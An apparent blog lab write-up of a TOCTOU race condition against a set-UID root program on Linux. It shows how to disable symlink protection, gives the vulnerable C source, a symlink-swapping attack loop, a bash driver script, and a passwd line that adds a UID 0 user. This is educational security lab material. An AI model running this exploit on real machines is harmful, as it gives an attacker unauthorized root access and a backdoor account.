linux_pwnlab4.1_raceCondition

the first thing to do is to disable the defense:

$ sudo sysctl -w fs.protected_symlinks=0

the vulnerable program

#include <stdio.h>
#include <unistd.h>
#include <string.h>
int main()
{
	char *fn="tmp/XYZ";
	char buffer[60];
	FILE *fp;
	
	scanf("%50s",buffer);

	if(!access(fn,W_OK)){//<-------------------------------1
	fp=fopen(fn,"a+");//<-----------------------------------2
	fwrite("\n",sizeof(char),1,fp);
	fwrite(buffer,sizeof(char),strlen(buffer),fp);
	fclose(fp);
	}else printf("no permission \n");
}

compile and set-UID

$gcc -o vulp vulp.c
$sudo chown root vulp
$sudo chmod 4755 vulp

how the race works?

raceCondition
‘fn’ is different pointer in line 1 and 2!

“/tmp/XYZ” just a symlink, can use
‘unlink(Symbol)’
‘symlink(Target,Symbol)’

should have a attack program

we add a root user to the host, with magic password

#include <unistd.h>

int main()
{
while(1)
{
unlink("/tmp/XYZ");
symlink("/dev/null","/tmp/XYZ");
usleep(1000);

unlink("/tmp/XYZ");
symlink("/etc/passwd","/tmp/XYZ");
usleep(1000);
}
return 0;
}

and we also need to check if our attack is worked or not

we can use “ls -l /etc/passwd” to check if the passwd file has been changed…

a shell script can help:

#!/bin/bash

CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)

while [ "$old" == "$new" ]
do
	./vulp < magic
	new=$($CHECK_FILE)
done
echo "STOP!the passwd file has been changed!"

and magic:

test:U6aMy0wojraho:0:0:test:/root:/bin/bash

first of all, we run the bash script

and we run the attack program in another terminal

and after a wile it works!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值